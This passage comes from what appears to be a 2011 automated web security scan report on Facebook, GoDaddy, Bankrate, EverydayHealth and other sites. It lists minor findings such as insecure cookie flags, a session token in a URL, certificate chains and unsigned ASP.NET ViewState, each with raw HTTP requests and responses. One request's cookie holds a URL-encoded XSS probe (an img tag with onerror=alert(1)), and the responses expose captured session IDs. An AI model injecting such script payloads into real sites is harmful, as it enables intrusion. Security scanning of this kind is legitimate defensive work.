Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=Mkkns; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.66.104
X-Cnection: close
Date: Thu, 05 May 2011 02:09:53 GMT
Content-Length: 46999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

6.12. https://www.facebook.com/pages/create.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /pages/create.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.22.122
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 32123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.13. https://www.facebook.com/r.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /r.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.226.129
Connection: close
Date: Thu, 05 May 2011 10:56:58 GMT
Content-Length: 29546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.14. https://www.facebook.com/recover.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /recover.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /recover.php?locale=en_US HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fpage%3D432; act=1304613672018%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613672031%2C%22act%22%2C1304613672018%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Flogin.php%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C482%2C422%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: L=2; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=1304595854; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
Set-Cookie: W=1304595854; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.132
X-Cnection: close
Date: Thu, 05 May 2011 11:44:14 GMT
Content-Length: 18743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.15. https://www.godaddy.com/gdshop/hosting/landing.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 237966
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...

6.16. https://www.godaddy.com/gdshop/registrar/search.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Expires: Thu, 28 Apr 2011 12:17:24 GMT
Location: https://www.godaddy.com/domains/search.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=FJIOEHOAAMMALPNOAONKBPHB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:23 GMT
Connection: close


6.17. https://www.godaddy.com/gdshop/website.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/website.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:25 GMT
Location: https://www.godaddy.com/hosting/website-builder.aspx?app%5Fhdr=
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=JJIOEHOAFBGIEMIAKMJJFOAB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:24 GMT
Connection: close


7. Session token in URL

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /extern/login_status.php?api_key=132151116822711&app_id=132151116822711&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12aabd56%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13c0616c4%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23792e5e8%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d6b0d054%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24e5b0ab%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1dc3547ec&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.115.59
X-Cnection: close
Date: Thu, 05 May 2011 00:57:31 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

8. SSL certificate
There are 4 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



8.1. https://www.facebook.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  www.facebook.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Sun Nov 14 18:00:00 CST 2010
Valid to:  Mon Dec 02 17:59:59 CST 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

8.2. https://www.fightmagazine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fightmagazine.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.fightmagazine.com
Issued by:  Thawte SSL CA
Valid from:  Mon Apr 04 19:00:00 CDT 2011
Valid to:  Thu May 03 18:59:59 CDT 2012

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

8.3. https://www.godaddy.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.GoDaddy.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Tue Jan 04 10:21:18 CST 2011
Valid to:  Mon Jan 14 16:28:36 CST 2013

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Thu Jun 29 12:06:20 CDT 2034

8.4. https://www.neodata.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.neodata.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.neodata.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Mon Aug 17 19:00:00 CDT 2009
Valid to:  Sun Sep 04 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

9. ASP.NET ViewState without MAC enabled
There are 5 instances of this issue:

Issue description

The ViewState is a mechanism built into the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.


9.1. http://www.bankrate.com/funnel/mortgages/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bankrate.com
Path:   /funnel/mortgages/

Request

GET /funnel/mortgages/ HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: a-brmweb02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:56:19 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:56:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 46622


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link type="text/css"
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

9.2. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /allergy/climate-change-and-allergies.aspx

Request

GET /allergy/climate-change-and-allergies.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:31 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO4hyeM5MDY2ODIwZC0xMWZhLTRjODktOGQzNS03NzFlZGNmNzhkODY1; expires=Wed, 13-Jul-2011 21:36:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ahsac155xnki2v55pzjexlmb; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49105


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Can Climate Change Cause Allergy? - Allergy Center - Every
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

9.3. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:32 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO6Y*xNkN2I5MjVjYi05YzUzLTRhY2MtYjcwOC03ZmQxMjAzMTMxNGU1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=esw2jyaebe5e2r55rhgfig45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49627


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Is Cholesterol Treatment Worth It? - EverydayHealth.com
<
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

9.4. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:32 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO7eIwsxNDRhNTExOC0xODcxLTQwN2ItYmNjOS1kZDk5OTdlYTE1N2I1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ytmqve451nrbiy55ltp0oe55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48908


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   TVs Common in Daycare Centers Despite Guidelines - Kids' H
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

9.5. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:33 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO9S9eM0ZDUxYzkzYi0zMDJmLTQwYmYtOTcwNC1mNDg4N2I4MDBiZmM1; expires=Wed, 13-Jul-2011 21:36:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=tew4lhmlby1awfarbc5plyur; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47316


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   3 Ways to Put the Wow! Back in Your Sex Life - Sexual Heal
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

10. Cookie scoped to parent domain
There are 119 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dooce.com
